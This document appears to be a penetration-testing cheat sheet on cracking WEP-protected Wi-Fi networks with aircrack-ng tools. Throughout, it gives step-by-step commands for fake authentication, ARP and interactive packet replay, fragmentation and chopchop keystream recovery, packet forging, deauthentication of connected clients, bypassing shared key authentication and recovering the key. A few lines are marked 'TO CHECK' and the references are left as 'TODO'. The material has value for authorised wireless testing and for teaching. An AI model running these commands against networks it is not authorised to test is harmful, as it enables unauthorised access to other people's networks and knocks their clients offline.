Wifi - WEP Cracking

Cracking WEP with a Client

ARP Request Replay Attack

Attack the ACCESS POINT

airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic

# Fake authentication for a more reliable attack
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0

# ARP replay attack
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0

# Deauthentication
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0

# Cracking
aircrack-ng arpreplay.cap

Interactive replay attack

Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.

airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic

# fake authentication for a more reliable attack
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0

# interactive replay attack (min arp 68, max arp 86)
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0  # interactive - force create a packet
# Packet selection (ARP packets met the characteristics): 
# - APs will always repeat packets destined to the broadcast
# - The packet will have the ToDS (To Distribution System) bit set to 1
# answer "y" multiple times

# cracking require ~> 250000 IVs
aircrack-ng -0 -z -n 64 clientwep-01.cap
    * -z: PTW attack
    * -n: number of bits in the WEP key

# backup file with an ARP packet
aireplay-ng -2 -r replay.cap mon0

Cracking WEP without a Client

• Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
• Need an AP configured with open system authentication

Prerequisite:

# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client

# fake authentication attack with association timing (every 60s try to reassociate)
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
# -1 6000 to avoid a time out.

Fragmentation attack

Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.

# attacker mac must be associated (fake auth)
# Press "Y"
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0

# use our PRGA from the fragmentation attack to generate an ARP request
# SRC_ADDR: 192.168.1.100 
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
# -l: the source IP i.e. in ARP, this is "Tell this IP"

# check the packet
tcpdump -n -vvv -e -s0 -r inject.cap

# inject our crafted packet
aireplay-ng -2 -r inject.cap mon0

# crack the WEP key
# Aircrack-ng will auto-update when new IVs are available
aircrack-ng -0 wepcrack

# if 64-bit WEP is used, cracking time < 5 minutes 
# switch to 128-bit keys after 600000 IVs
# use the `-f 4` after 2000000
aircrack-ng -n 64 <capture filename>

KoreK Chopchop attack

Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack

# chopchop attack: -4
# out decrypted: .cap
# out prga: .xor
# Press "Y" (choose a small packet)
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0

# check the packet and find the network addresses
tcpdump -n -vvv -e -s0 -r inject.cap

# use our PRGA from the fragmentation attack
# SRC_ADDR: 192.168.1.100 
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap

# inject our crafted packet
aireplay-ng -2 -r chochop_out.cap mon0

# crack the WEP key
aircrack-ng -0 wepcrack

Bypassing WEP Shared Key Authentication SKA

By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.

Prerequisite:

• Authentication: Shared Key
• When Fake Authentication => AP rejects open-system authentication

# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0

# deauthentication attack on the connected client
# airodump should display SKA under the AUTH column
# PRGA file will be saved as xxxx.xor
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0

# fake authentication attack with association timing (every 60s try to reassociate)
# should display switching to Shared Key Authentication
# If you are using a PRGA  file obtained  from a chopchop attack, make sure that it is at least 144 bytes long
# If you have "Part2:  Association  Not  answering...(Step3)" -> spoof the mac address used to fake auth
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0

# ARP replay attack
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0

# deauthentication attack on the connected client
# speed the ARP attack process using deauth
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon

# crack the WEP key
aircrack-ng sharedkey.cap

References

• TODO

Share this content